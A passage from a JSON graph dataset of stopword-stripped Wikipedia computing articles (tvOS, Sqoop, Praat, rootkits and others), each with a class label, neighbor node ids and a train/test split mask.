overwhelming rest system little many tables use sequence number primary key increases new inserted row index key also experience contention overheat processes inserts one solution reverse digits primary key spreads inserts table key across multiple parts database basic technique split large tables multiple partitions based ranges values key field example data year could held separate disk drive separate computer partitioning removes limits sizes single table replicated databases maintain copies tables databases multiple computers scaling technique particularly convenient seldom never-updated data transaction history tax tables variety approaches used scale beyond limits single computer hp enterprise nonstop sql uses shared nothing architecture neither data memory shared across server boundaries coordinator routes database requests correct server architecture provides near-linear scalability widely supported x/open xa standard employs global transaction monitor coordinate distributed transactions among semi-autonomous xa-compliant transaction resources oracle rac uses different model achieve scalability based shared-everything architecture approach incorporates shared disk approach allows multiple computers access disk cluster network-attached storage nas storage area networks sans coupled local area networks fibre channel technology enable configurations approach includes shared logical cache data cached memory server made available servers without requiring read data disk page moved server server satisfy requests updates generally happen quickly popular page updated multiple transactions little delay approach claimed support clusters containing 100 servers researchers question inherent limitations relational database management systems gigaspaces example contends space-based architecture required achieve performance scalability base one makes case extreme scalability within mainstream relational database technology",
    "neighbors": [
      11136,
      11393,
      4614,
      7816,
      5772,
      11024,
      1049,
      9883,
      6433,
      10675,
      6850,
      9286,
      11343,
      4817,
      2901,
      8539,
      10340,
      1638,
      6124,
      5999,
      7802
    ],
    "mask": "Test"
  },
  {
    "node_id": 9783,
    "label": 9,
    "text": "Comparison_of_audio_synthesis_environments:comparison audio synthesis environments software audio synthesis environments typically consist audio programming language may graphical user environment design/run language although many environments comparable abilities produce high-quality audio differences specialties draw users particular platform article compares noteworthy audio synthesis environments enumerates basic issues associated use audio synthesis environments comprise wide varying range software hardware configurations even different versions environment differ dramatically broad variability certain aspects different systems directly compared moreover levels comparison either difficult objectively quantify depend purely personal preference commonly considered subjective attributes comparison include attributes vary strongly depending tasks used evaluation common comparisons include audio software often slightly different sound compared others different ways implement basic building blocks sinewaves pink noise fft result slightly different aural characteristics although people course prefer one system sound another perhaps best output determined using sophisticated audio analyzers combination listener ears idea would arrive would agree pure sound possible interface audio system often significant influence creative flow user possible stable/mature systems listed fully featured enough able achieve enormous range sonic/compositional objectives made easy made difficult difficult boil brief comparative statement one issue may interface metaphors used e.g boxes-and-wires documents flow graphs hardware mixing desks interfaces language environment software hardware user interfaces",
    "neighbors": [
      2691,
      7172,
      3462,
      6797,
      7571,
      6933,
      6810,
      9245,
      3876,
      4777,
      5677,
      692,
      823,
      3665,
      596,
      7128,
      7769,
      9565,
      10083,
      3046,
      6502,
      9320,
      10470,
      8554,
      9210,
      2045,
      7550
    ],
    "mask": "None"
  },
  {
    "node_id": 9784,
    "label": 2,
    "text": "TvOS:tvos tvos operating system developed apple inc. 4th generation later apple tv digital media player tvos announced september 9 2015 apple september 2015 event alongside 4th generation apple tv october 29 2015 4th generation apple tv pre-orders began shipments began following week tvos initially based ios whereas system software 2nd 3rd generation apple tv based stripped-down versions ios 4th generation apple tv support third-party software via app store rumored prior apple september 2015 event held september 9 2015 october 30 2015 4th generation apple tv became available shipped tvos 9.0 november 9 2015 tvos 9.0.1 released primarily update address minor issues tvos 9.1 released december 8 2015 along os x 10.11.2 ios 9.2 watchos 2.1 along updates apple also updated remote apps ios watchos allowing basic remote functionality 4th generation apple tv previously said app worked past versions apple tv november 25 2015 facebook debuted sdk tvos allowing applications log facebook share facebook use facebook analytics way ios applications december 2 2015 twitter debuted login authentication service tvos – digits – allowing users log apps services simple unique code available online march 11 2016 pangu team announced twitter would creating new jailbreak tool apple tv 4 running tvos 9.0–9.0.1 would released following week june 13 2016 wwdc 2016 apple svp internet services eddy cue announced next major version tvos tvos 10. tvos 10 brings new functionality siri search enhancements single sign cable subscriptions dark mode new remote application controlling apple tv tvos 9 shipped several new features fourth generation apple tv one major features ability move interface new touchpad remote using multi-touch gestures introduced new app store users download install new applications apps games made available developers develop applications apple tv tvos tvos 9 adds support siri lets users multitude things cross-application search movie/tv show rewind fast forward name actor/director current movie skip back 15 seconds tvos added support application switcher apple tv application customization options cinematic screensavers control tv using included siri remote built-in support hdmi-cec tvos addition tvos allows user control apple tv many different ways include using included siri remote pairing third-party universal remote pairing mfi gamepad control games using remote app ios pairing bluetooth keyboard aid typing experience user tvos designed based ios tvos inherited many accessibility features ios macos tvos includes apple technologies voiceover zoom siri help blind impaired vision voiceover apple screen reader available 30 languages enables visually impaired users know visual display input responses on-screen prompts voiceover uses gestures similar apple products flicks taps rotor like apple products iphone three click sequence home button activate accessibility features apple tv tvos user activate voiceover without installation process one needs triple-click menu button siri remote apple tv guide user complete initial setup task non-trivial visually impaired comparable products market another accessibility feature increase contrast screen acts reducing transparency background elements movie tv show pages menu tabs parts operating system high-contrast also turned cursor better delineate focused content user also opt turn reduce motion screen actions moving app icons home screen launching apps visually simpler benefit reduce strain eyes tvos enables users watch movies audio descriptions shown screen movies audio descriptions displayed ad audio description icon itunes store tvos itunes macintosh windows pc pairing bluetooth keyboard tvos apple tv enables another accessibility feature also incorporation voiceover typing voiceover mirrors audio voice character pressed keyboard repeated entered apple tv designed work apple wireless keyboard apple magic keyboard work however almost brand bluetooth keyboard apple tv without tvos supports closed captioning deaf hard hearing experience tv episodes feature-length movies compatible episodes movies denoted cc closed captioning sdh subtitles deaf hard-of-hearing icon itunes store either apple tv itunes viewer customize captions episodes movies styles fonts conducive hearing and/or visual impairment touch surface siri remote customizable tracking set fast adjusts thumb movements made amplify distance relation far thumb moved glass touchpad conversely tracking set slow larger movements thumb touchpad tune distance traversed screen help people disabilities apple remote app ios devices allows control apple tv iphone ipad ipod touch ios remote app increases accessibility apple tv enabling switch control switch control unique apple technology enables navigation sequentially onscreen items perform specific actions selecting tapping dragging typing using third party bluetooth-enabled switch hardware made handicaps tvos ships all-new development tools developers tvos adds support all-new sdk developers build apps tv including apis included ios 9 metal also adds tvos app store allows users browse download install wide variety applications addition developers use interface inside application rather able use apple interface since tvos based ios easy port existing ios apps apple tv xcode making refinements app better suit larger screen apple provides xcode free charge registered apple developers develop new apple tv necessary make parallax image application icon order apple provides parallax exporter previewer development tools apple tv information new updates apple tv 2nd generation onwards published apple knowledge base ios 4.1 first version ios available apple tv 2nd generation included apple tv software 4.0 october 23 2011 apple tv 2nd generation received ios 5.0 software photo stream airplay mirroring iphone 4s ipad 2 nhl wall street journal slideshow themes netflix subtitles contrary rumors code found ios 5 release bring support bluetooth apps apple tv 2nd generation september 24 2012 apple tv 2nd generation onwards received ios 6.0 software update shared photo streams itunes account switching better airplay functionality trailers searching among smaller improvements september 20 2013 apple tv second generation onwards received ios 7.0 software update itunes radio airplay icloud september 18 2014 third generation apple tv received ios 8.0 software update redesigned ui family sharing peer-to-peer airplay tvos 9 operating system 95 based ios 9 adaptations made television interface announced september 9 2015 alongside new ipad pro iphone 6s tim cook took stage introduced tvos saying time apple tv gain modern os support apps future tv available apple tv 4th generation released october 2015 adds native sdk develop apps app store distribute support siri universal search across multiple apps operating systems developed apple inc",
    "neighbors": [
      6155,
      4114,
      25,
      6180,
      6186,
      4139,
      8253,
      8262,
      2120,
      6218,
      8266,
      6221,
      2132,
      4180,
      10333,
      97,
      8303,
      8304,
      6264,
      8315,
      8316,
      2179,
      132,
      10382,
      6296,
      2201,
      4251,
      6301,
      2207,
      2212,
      171,
      178,
      6329,
      4283,
      8388,
      10436,
      2248,
      8395,
      4305,
      2259,
      8404,
      10455,
      6361,
      8410,
      4318,
      6369,
      10470,
      231,
      8423,
      6377,
      2282,
      10478,
      242,
      8441,
      2301,
      4364,
      6412,
      10512,
      273,
      274,
      4383,
      292,
      10535,
      2345,
      6445,
      4399,
      2355,
      4409,
      2363,
      6459,
      2365,
      2366,
      10562,
      4423,
      2388,
      6491,
      6495,
      8551,
      10599,
      10602,
      10608,
      2421,
      376,
      2424,
      8573,
      2439,
      394,
      6539,
      4492,
      414,
      2462,
      421,
      4521,
      4525,
      10676,
      2492,
      446,
      2502,
      456,
      464,
      6608,
      470,
      8662,
      6624,
      487,
      10730,
      10731,
      495,
      8687,
      6654,
      2560,
      10755,
      6675,
      8725,
      10776,
      4636,
      4637,
      4643,
      6700,
      8754,
      10803,
      10809,
      8767,
      576,
      2625,
      8772,
      8774,
      8783,
      10838,
      607,
      8806,
      6760,
      10856,
      6763,
      2673,
      2676,
      4727,
      633,
      634,
      8829,
      2686,
      6783,
      640,
      10878,
      6787,
      10883,
      10888,
      8842,
      10891,
      6797,
      671,
      2735,
      8879,
      6837,
      8889,
      713,
      10973,
      6884,
      4844,
      2819,
      11013,
      784,
      8977,
      787,
      789,
      4888,
      8991,
      823,
      9022,
      9027,
      11075,
      838,
      6988,
      850,
      4957,
      9063,
      7020,
      2925,
      7027,
      2933,
      7039,
      11145,
      7052,
      7057,
      5022,
      2979,
      9123,
      11171,
      11173,
      935,
      5036,
      11184,
      2995,
      9141,
      9151,
      11204,
      11205,
      7118,
      9166,
      9174,
      7133,
      3038,
      9182,
      5093,
      998,
      5105,
      3058,
      7154,
      9201,
      11257,
      5115,
      11271,
      7187,
      11289,
      7217,
      1074,
      7224,
      5177,
      7246,
      7249,
      7253,
      3160,
      3162,
      9306,
      9308,
      3167,
      11363,
      7285,
      9335,
      1147,
      7292,
      3197,
      1150,
      5247,
      9343,
      11390,
      11391,
      7307,
      1177,
      9370,
      3228,
      11430,
      3241,
      3248,
      11459,
      7378,
      3286,
      7382,
      9430,
      9436,
      3293,
      1247,
      11489,
      9444,
      7403,
      9451,
      11501,
      5363,
      1273,
      9466,
      11513,
      7420,
      9468,
      1278,
      1290,
      3338,
      9487,
      5397,
      1304,
      7460,
      7477,
      11573,
      7483,
      1346,
      7492,
      7496,
      5452,
      5457,
      7507,
      7511,
      11608,
      7521,
      3426,
      5484,
      11629,
      11635,
      5492,
      5506,
      7561,
      7566,
      1428,
      9625,
      3483,
      11675,
      3487,
      3488,
      1445,
      9643,
      7601,
      11698,
      7614,
      1482,
      3542,
      1508,
      5619,
      7682,
      9732,
      1549,
      5647,
      7697,
      1561,
      9762,
      3626,
      7727,
      9784,
      1608,
      1623,
      3672,
      3681,
      9826,
      5733,
      3691,
      9835,
      9844,
      7806,
      5784,
      9882,
      9887,
      7848,
      7857,
      9907,
      1718,
      5819,
      3772,
      7869,
      5823,
      1736,
      3790,
      5840,
      1772,
      1804,
      9999,
      3862,
      5912,
      10016,
      10023,
      7983,
      7991,
      7999,
      10052,
      8020,
      10080,
      1891,
      3948,
      8063,
      10113,
      8069,
      1927,
      6023,
      3978,
      1946,
      6049,
      10156,
      8109,
      1971,
      6078,
      4040,
      8136,
      4068,
      2023,
      10215,
      4073,
      8170,
      4076,
      6128,
      2035,
      10235,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 9785,
    "label": 1,
    "text": "Plant_DNA_C-values_Database:plant dna c-values database plant dna c-values database comprehensive catalogue c-value nuclear dna content diploids genome size data land plants algae database created prof. michael d. bennett dr. ilia j. leitch royal botanic gardens kew uk database originally launched angiosperm dna c-values database april 1997 essentially online version collected data lists published prof. bennett colleagues since 1970s release 1.0 inclusive plant dna c-values database launched 2001 subsequent releases 2.0 january 2003 3.0 december 2004 addition angiosperm dataset made available 1997 database expanded taxonomically several times includes data pteridophytes since 2000 gymnosperms since 2001 bryophytes since 2001 algae since 2004 see 1 update history note subset databases cited individually may contain different sets authors recent release database release 7.1 went live april 2019 contains data 12,273 species plants comprising 10,770 angiosperms 421 gymnosperms 303 pteridophytes 246 ferns fern allies 57 lycophytes 334 bryophytes 445 algae similar animal genome size database created 2001 dr. t. ryan gregory university guelph canada",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 9786,
    "label": 3,
    "text": "Embrace,_extend,_and_extinguish:embrace extend extinguish embrace extend extinguish eee also known embrace extend exterminate phrase u.s. department justice found used internally microsoft describe strategy entering product categories involving widely used standards extending standards proprietary capabilities using differences strongly disadvantage competitors strategy phrase embrace extend first described outside microsoft 1996 article new york times titled tomorrow world wide web microsoft pc king wants reign internet writer john markoff said rather merely embrace extend internet company critics fear microsoft intends engulf phrase embrace extend also appears facetious motivational song anonymous microsoft employee interview steve ballmer new york times variation embrace extend extinguish first introduced united states v. microsoft antitrust trial vice president intel steven mcgeady used phrase explain microsoft vice president paul maritz statement 1995 meeting intel described microsoft strategy kill html extending strategy three phases microsoft claims original strategy anti-competitive rather exercise discretion implement features believes customers want older variant phrase embrace extend innovate j allard 1994 memo windows next killer application internet paul maritz executives microsoft memo starts background internet general proposes strategy turn windows next killer app internet browser wars companies besides microsoft introduced proprietary non–standards-compliant extensions example 1995 netscape implemented font tag among html extensions without seeking review standards body rise internet explorer two companies became locked dead heat out-implement non–standards-compliant features 2004 prevent repeat browser wars resulting morass conflicting standards browser vendors apple inc. safari mozilla foundation firefox google inc. google chrome opera software opera browser formed web hypertext application technology working group whatwg create open standards complement world wide web consortium microsoft refused join citing group lack patent policy reason",
    "neighbors": [
      8584,
      4011,
      5612,
      5677,
      7983,
      6098,
      5078,
      8923,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 9787,
    "label": 0,
    "text": "Praat:praat praat talk free computer software package speech analysis phonetics designed continues developed paul boersma david weenink university amsterdam run wide range operating systems including various versions unix linux mac microsoft windows 2000 xp vista 7 8 10 program supports speech synthesis including articulatory synthesis",
    "neighbors": [
      6144,
      3874,
      3533,
      6797,
      7983,
      5492,
      823,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9788,
    "label": 3,
    "text": "Approximate_computing:approximate computing approximate computing computation technique returns possibly inaccurate result rather guaranteed accurate result used applications approximate result sufficient purpose one example situation search engine exact answer may exist certain search query hence many answers may acceptable similarly occasional dropping frames video application go undetected due perceptual limitations humans approximate computing based observation many scenarios although performing exact computation requires large amount resources allowing bounded approximation provide disproportionate gains performance energy still achieving acceptable result accuracy example k -means clustering algorithm allowing 5 loss classification accuracy provide 50 times energy saving compared fully accurate classification key requirement approximate computing approximation introduced non-critical data since approximating critical data e.g. control operations lead disastrous consequences program crash erroneous output several strategies used performing approximate computing approximate computing used variety domains applications error-tolerant multimedia processing machine learning signal processing scientific computing etc google using approach tensor processing units tpu custom asic main issue approximate computing identification section application approximated case large scale applications common find people holding expertise approximate computing techniques enough expertise application domain vice versa order solve problem programming paradigms proposed common clear role separation application programmer application domain expert approaches allow spread common optimizations approximate computing techniques",
    "neighbors": [
      1801,
      9345,
      10469
    ],
    "mask": "Test"
  },
  {
    "node_id": 9789,
    "label": 7,
    "text": "Sqoop:sqoop sqoop command-line interface application transferring data relational databases hadoop sqoop supports incremental loads single table free form sql query well saved jobs run multiple times import updates made database since last import imports also used populate tables hive hbase exports used put data hadoop relational database sqoop got name sql-to-hadoop sqoop became top-level apache project march 2012 informatica provides sqoop-based connector version 10.1 pentaho provides open-source sqoop based connector steps sqoop import sqoop export etl suite pentaho data integration since version 4.5 software microsoft uses sqoop-based connector help transfer data microsoft sql server databases hadoop couchbase inc. also provides couchbase server-hadoop connector means sqoop",
    "neighbors": [
      10377,
      8460,
      7567,
      1296,
      6161,
      10134,
      1047,
      11030,
      8217,
      11161,
      6555,
      8860,
      3877,
      10661,
      11303,
      5677,
      1327,
      7983,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      9286,
      4944,
      1363,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      2163,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9790,
    "label": 9,
    "text": "Envoy_(WordPerfect):envoy wordperfect computing envoy proprietary portable document file format marketed wordperfect corporation created competitor acrobat pro introduced tumbleweed communications corporation 1993 shipped wordperfect office march 1994 envoy file could created use special printer driver wordperfect resulting document could viewed separate viewer application envoy distributable viewer also worked web browser plugin unlike adobe pdf file format publicly documented envoy failed make headway pdf largely unused reported success reading envoy documents printing postscript envoy distributable viewer converting postscript file pdf postscript file also viewed directly using viewer ghostscript",
    "neighbors": [
      3974,
      10352,
      3921,
      8627,
      8628
    ],
    "mask": "Test"
  },
  {
    "node_id": 9791,
    "label": 4,
    "text": "Rootkit:rootkit rootkit collection computer software typically malicious designed enable access computer area software otherwise allowed example unauthorized user often masks existence existence software term rootkit concatenation root traditional name privileged account unix-like operating systems word kit refers software components implement tool term rootkit negative connotations association malware rootkit installation automated attacker install obtained root administrator access obtaining access result direct attack system i.e exploiting known vulnerability privilege escalation password obtained cracking social engineering tactics like phishing installed becomes possible hide intrusion well maintain privileged access key root administrator access full control system means existing software modified including software might otherwise used detect circumvent rootkit detection difficult rootkit may able subvert software intended find detection methods include using alternative trusted operating system behavioral-based methods signature scanning difference scanning memory dump analysis removal complicated practically impossible especially cases rootkit resides kernel reinstallation operating system may available solution problem dealing firmware rootkits removal may require hardware replacement specialized equipment term rootkit root kit originally referred maliciously modified set administrative tools unix-like operating system granted root access intruder could replace standard administrative tools system rootkit intruder could obtain root access system whilst simultaneously concealing activities legitimate system administrator first-generation rootkits trivial detect using tools tripwire compromised access information lane davis steven dake wrote earliest known rootkit 1990 sun microsystems sunos unix operating system lecture gave upon receiving turing award 1983 ken thompson bell labs one creators unix theorized subverting c compiler unix distribution discussed exploit modified compiler would detect attempts compile unix codice_1 command generate altered code would accept user correct password additional backdoor password known attacker additionally compiler would detect attempts compile new version compiler would insert exploits new compiler review source code codice_1 command updated compiler would reveal malicious code exploit equivalent rootkit first documented computer virus target personal computer discovered 1986 used cloaking techniques hide brain virus intercepted attempts read boot sector redirected elsewhere disk copy original boot sector kept time dos-virus cloaking methods became sophisticated advanced techniques including hooking low-level disk int 13h bios interrupt calls hide unauthorized modifications files first malicious rootkit windows nt operating system appeared 1999 trojan called ntrootkit created greg hoglund followed hackerdefender 2003 first rootkit targeting mac os x appeared 2009 stuxnet worm first target programmable logic controllers plc 2005 sony bmg published cds copy protection digital rights management software called extended copy protection created software company first 4 internet software included music player silently installed rootkit limited user ability access cd software engineer mark russinovich created rootkit detection tool rootkitrevealer discovered rootkit one computers ensuing scandal raised public awareness rootkits cloak rootkit hid user file starting sys soon russinovich report malware appeared took advantage vulnerability affected systems one bbc analyst called public relations nightmare sony bmg released patches uninstall rootkit exposed users even serious vulnerability company eventually recalled cds united states class-action lawsuit brought sony bmg greek wiretapping case 2004-05 also referred greek watergate involved illegal telephone tapping 100 mobile phones vodafone greece network belonging mostly members greek government top-ranking civil servants taps began sometime near beginning august 2004 removed march 2005 without discovering identity perpetrators intruders installed rootkit targeting ericsson axe telephone exchange according ieee spectrum first time rootkit observed special-purpose system case ericsson telephone switch rootkit designed patch memory exchange running enable wiretapping disabling audit logs patch commands list active processes active data blocks modify data block checksum verification command backdoor allowed operator sysadmin status deactivate exchange transaction log alarms access commands related surveillance capability rootkit discovered intruders installed faulty update caused sms texts undelivered leading automated failure report generated ericsson engineers called investigate fault discovered hidden data blocks containing list phone numbers monitored along rootkit illicit monitoring software modern rootkits elevate access rather used make another software payload undetectable adding stealth capabilities rootkits classified malware payloads bundled malicious example payload might covertly steal user passwords credit card information computing resources conduct unauthorized activities small number rootkits may considered utility applications users example rootkit might cloak cd-rom-emulation driver allowing video game users defeat anti-piracy measures require insertion original installation media physical optical drive verify software legitimately purchased rootkits payloads many uses instances rootkits provide desired functionality may installed intentionally behalf computer user least five types rootkit ranging lowest level firmware highest privileges least privileged user-based variants operate ring 3 hybrid combinations may occur spanning example user mode kernel mode user-mode rootkits run ring 3 along applications user rather low-level system processes number possible installation vectors intercept modify standard behavior application programming interfaces apis inject dynamically linked library .dll file windows .dylib file mac os x processes thereby able execute inside target process spoof others sufficient privileges simply overwrite memory target application injection mechanisms include kernel-mode rootkits run highest operating system privileges ring 0 adding code replacing portions core operating system including kernel associated device drivers operating systems support kernel-mode device drivers execute privileges operating system many kernel-mode rootkits developed device drivers loadable modules loadable kernel modules linux device drivers microsoft windows class rootkit unrestricted security access difficult write complexity makes bugs common bugs code operating kernel level may seriously impact system stability leading discovery rootkit one first widely known kernel rootkits developed windows nt 4.0 released phrack magazine 1999 greg hoglund kernel rootkits especially difficult detect remove operate security level operating system thus able intercept subvert trusted operating system operations software antivirus software running compromised system equally vulnerable situation part system trusted rootkit modify data structures windows kernel using method known direct kernel object manipulation dkom method used hide processes kernel mode rootkit also hook system service descriptor table ssdt modify gates user mode kernel mode order cloak similarly linux operating system rootkit modify system call table subvert kernel functionality common rootkit creates hidden encrypted filesystem hide malware original copies files infected operating systems evolving counter threat kernel-mode rootkits example 64-bit editions microsoft windows implement mandatory signing kernel-level drivers order make difficult untrusted code execute highest privileges system kernel-mode rootkit variant called bootkit infect startup code like master boot record mbr volume boot record vbr boot sector way used attack full disk encryption systems example attack disk encryption evil maid attack attacker installs bootkit unattended computer envisioned scenario maid sneaking hotel room victims left hardware bootkit replaces legitimate boot loader one control typically malware loader persists transition protected mode kernel loaded thus able subvert kernel example stoned bootkit subverts system using compromised boot loader intercept encryption keys passwords recently alureon rootkit successfully subverted requirement 64-bit kernel-mode driver signing windows 7 modifying master boot record although malware sense something user n't want certain vista loader windows loader software work similar way injecting acpi slic system licensed internal code table ram-cached version bios boot order defeat windows vista windows 7 activation process vector attack rendered useless non-server versions windows 8 use unique machine-specific key system used one machine many antivirus companies provide free utilities programs remove bootkits rootkits created type ii hypervisors academia proofs concept exploiting hardware virtualization features intel vt amd-v type rootkit runs ring -1 hosts target operating system virtual machine thereby enabling rootkit intercept hardware calls made original operating system unlike normal hypervisors load operating system load operating system promoting virtual machine hypervisor rootkit make modifications kernel target subvert however mean detected guest operating system example timing differences may detectable cpu instructions subvirt laboratory rootkit developed jointly microsoft university michigan researchers academic example virtual machine–based rootkit vmbr blue pill software another 2009 researchers microsoft north carolina state university demonstrated hypervisor-layer anti-rootkit called hooksafe provides generic protection kernel-mode rootkits windows 10 introduced new feature called device guard takes advantage virtualization provide independent external protection operating system rootkit-type malware firmware rootkit uses device platform firmware create persistent malware image hardware router network card hard drive system bios rootkit hides firmware firmware usually inspected code integrity john heasman demonstrated viability firmware rootkits acpi firmware routines pci expansion card rom october 2008 criminals tampered european credit card-reading machines installed devices intercepted transmitted credit card details via mobile phone network march 2009 researchers alfredo ortega anibal sacco published details bios-level windows rootkit able survive disk replacement operating system re-installation months later learned laptops sold legitimate rootkit known absolute computrace absolute lojack laptops preinstalled many bios images anti-theft technology system researchers showed turned malicious purposes intel active management technology part intel vpro implements out-of-band management giving administrators remote administration remote management remote control pcs involvement host processor bios even system powered remote administration includes remote power-up power-down remote reset redirected boot console redirection pre-boot access bios settings programmable filtering inbound outbound network traffic agent presence checking out-of-band policy-based alerting access system information hardware asset information persistent event logs information stored dedicated memory hard drive accessible even os pc powered functions require deepest level rootkit second non-removable spy computer built around main computer sandy bridge future chipsets ability remotely kill restore lost stolen pc via 3g hardware rootkits built chipset help recover stolen computers remove data render useless also present privacy security concerns undetectable spying redirection management hackers might gain control rootkits employ variety techniques gain control system type rootkit influences choice attack vector common technique leverages security vulnerabilities achieve surreptitious privilege escalation another approach use trojan horse deceiving computer user trusting rootkit installation program benign—in case social engineering convinces user rootkit beneficial installation task made easier principle least privilege applied since rootkit explicitly request elevated administrator-level privileges classes rootkits installed someone physical access target system rootkits may also installed intentionally owner system somebody authorized owner e.g purpose employee monitoring rendering subversive techniques unnecessary malicious rootkit installations commercially driven pay-per-install ppi compensation method typical distribution installed rootkit takes active measures obscure presence within host system subversion evasion standard operating system security tools application programming interface apis used diagnosis scanning monitoring rootkits achieve modifying behavior core parts operating system loading code processes installation modification drivers kernel modules obfuscation techniques include concealing running processes system-monitoring mechanisms hiding system files configuration data uncommon rootkit disable event logging capacity operating system attempt hide evidence attack rootkits theory subvert operating system activities perfect rootkit thought similar perfect crime one nobody realizes taken place rootkits also take number measures ensure survival detection cleaning antivirus software addition commonly installing ring 0 kernel-mode complete access system include polymorphism changing signature hard detect stealth techniques regeneration disabling turning anti-malware software installing virtual machines may easier researchers discover analyze fundamental problem rootkit detection operating system subverted particularly kernel-level rootkit trusted find unauthorized modifications components actions requesting list running processes list files directory trusted behave expected words rootkit detectors work running infected systems effective rootkits defect camouflage run lower user-mode privileges detection software kernel computer viruses detection elimination rootkits ongoing struggle sides conflict detection take number different approaches including looking virus signatures e.g antivirus software integrity checking e.g digital signatures difference-based detection comparison expected vs. actual results behavioral detection e.g monitoring cpu usage network traffic kernel-mode rootkits detection considerably complex requiring careful scrutiny system call table look hooked functions malware may subverting system behavior well forensic scanning memory patterns indicate hidden processes unix rootkit detection offerings include zeppoo chkrootkit rkhunter ossec windows detection tools include microsoft sysinternals rootkitrevealer avast antivirus sophos anti-rootkit f-secure radix gmer windowsscope rootkit detectors prove effective ultimately contribute ineffectiveness malware authors adapt test code escape detection well-used tools detection examining storage suspect operating system operational miss rootkits recognised checking software rootkit active suspicious behavior suppressed conventional anti-malware software running rootkit operational may fail rootkit hides effectively best reliable method operating-system-level rootkit detection shut computer suspected infection check storage booting alternative trusted medium e.g rescue cd-rom usb flash drive technique effective rootkit actively hide presence running behavioral-based approach detecting rootkits attempts infer presence rootkit looking rootkit-like behavior example profiling system differences timing frequency api calls overall cpu utilization attributed rootkit method complex hampered high incidence false positives defective rootkits sometimes introduce obvious changes system alureon rootkit crashed windows systems security update exposed design flaw code logs packet analyzer firewall intrusion prevention system may present evidence rootkit behaviour networked environment antivirus products rarely catch viruses public tests depending used extent even though security software vendors incorporate rootkit detection products rootkit attempt hide antivirus scan stealth detector may notice rootkit attempts temporarily unload system signature detection fingerprinting still find combined approach forces attackers implement counterattack mechanisms retro routines attempt terminate antivirus programs signature-based detection methods effective well-published rootkits less specially crafted custom-root rootkits another method detect rootkits compares trusted raw data tainted content returned api example binaries present disk compared copies within operating memory operating systems in-memory image identical on-disk image results returned file system windows registry apis checked raw structures underlying physical disks—however case former valid differences introduced operating system mechanisms like memory relocation shimming rootkit may detect presence difference-based scanner virtual machine latter commonly used perform forensic analysis adjust behaviour differences detected difference-based detection used russinovich rootkitrevealer tool find sony drm rootkit code signing uses public-key infrastructure check file modified since digitally signed publisher alternatively system owner administrator use cryptographic hash function compute fingerprint installation time help detect subsequent unauthorized changes on-disk code libraries however unsophisticated schemes check whether code modified since installation time subversion prior time detectable fingerprint must re-established time changes made system example installing security updates service pack hash function creates message digest relatively short code calculated bit file using algorithm creates large changes message digest even smaller changes original file recalculating comparing message digest installed files regular intervals trusted list message digests changes system detected monitored—as long original baseline created malware added more-sophisticated rootkits able subvert verification process presenting unmodified copy file inspection making code modifications memory reconfiguration registers later compared white list expected values code performs hash compare extend operations must also protected—in context notion immutable root-of-trust holds first code measure security properties system must trusted ensure rootkit bootkit compromise system fundamental level forcing complete dump virtual memory capture active rootkit kernel dump case kernel-mode rootkit allowing offline forensic analysis performed debugger resulting dump file without rootkit able take measures cloak technique highly specialized may require access non-public source code debugging symbols memory dumps initiated operating system always used detect hypervisor-based rootkit able intercept subvert lowest-level attempts read memory—a hardware device one implements non-maskable interrupt may required dump memory scenario virtual machines also make easier analyze memory compromised machine underlying hypervisor rootkits avoid infecting virtual machines reason manual removal rootkit often difficult typical computer user number security-software vendors offer tools automatically detect remove rootkits typically part antivirus suite microsoft monthly windows malicious software removal tool able detect remove classes rootkits also windows defender offline remove rootkits runs trusted environment operating system starts antivirus scanners bypass file system apis vulnerable manipulation rootkit instead access raw file system structures directly use information validate results system apis identify differences may caused rootkit experts believe reliable way remove re-install operating system trusted media antivirus malware removal tools running untrusted system may ineffective well-written kernel-mode rootkits booting alternative operating system trusted media allow infected system volume mounted potentially safely cleaned critical data copied off—or alternatively forensic examination performed lightweight operating systems windows pe windows recovery console windows recovery environment bartpe live distros used purpose allowing system cleaned even type nature rootkit known manual repair may impractical re-installing operating system applications safer simpler quicker like much malware used attackers many rootkit implementations shared easily available internet uncommon see compromised system sophisticated publicly available rootkit hides presence unsophisticated worms attack tools apparently written inexperienced programmers rootkits available internet originated exploits academic proofs concept demonstrate varying methods hiding things within computer system taking unauthorized control often fully optimized stealth rootkits sometimes leave unintended evidence presence even rootkits used attack often effective rootkits keylogging features gameguard installed part online commercial games system hardening represents one first layers defence rootkit prevent able install applying security patches implementing principle least privilege reducing attack surface installing antivirus software standard security best practices effective classes malware new secure boot specifications like unified extensible firmware interface designed address threat bootkits even vulnerable security features offer utilized server systems remote server attestation using technologies intel trusted execution technology txt provide way verifying servers remain known good state example microsoft bitlocker encryption data-at-rest verifies servers known good state bootup privatecore vcage software offering secures data-in-use memory avoid bootkits rootkits verifying servers known good state bootup privatecore implementation works concert intel txt locks server system interfaces avoid potential bootkits rootkits",
    "neighbors": [
      3072,
      2049,
      5636,
      10245,
      10756,
      3595,
      9227,
      9233,
      9746,
      9242,
      9761,
      9762,
      2084,
      3620,
      7207,
      9256,
      9771,
      3629,
      7222,
      10297,
      3643,
      5179,
      7739,
      3135,
      1088,
      4165,
      10835,
      3163,
      6241,
      107,
      10348,
      6254,
      7794,
      1143,
      10872,
      10875,
      1660,
      4732,
      1150,
      5245,
      5246,
      8320,
      6786,
      131,
      5764,
      9356,
      6797,
      10380,
      10896,
      10898,
      4245,
      10392,
      1690,
      7834,
      9885,
      5281,
      2213,
      7851,
      2734,
      687,
      7855,
      3250,
      186,
      5306,
      700,
      3262,
      704,
      8387,
      10436,
      7365,
      10437,
      7368,
      10952,
      5325,
      10448,
      7377,
      3283,
      2262,
      6360,
      5337,
      1242,
      3290,
      4314,
      6877,
      8413,
      1247,
      9439,
      9440,
      2275,
      6373,
      6382,
      1776,
      3320,
      4344,
      3323,
      2811,
      4348,
      5373,
      1279,
      4863,
      9983,
      10492,
      3843,
      6916,
      2309,
      1801,
      778,
      8976,
      7441,
      8978,
      4883,
      9488,
      5397,
      278,
      4374,
      7957,
      7449,
      11539,
      3867,
      4892,
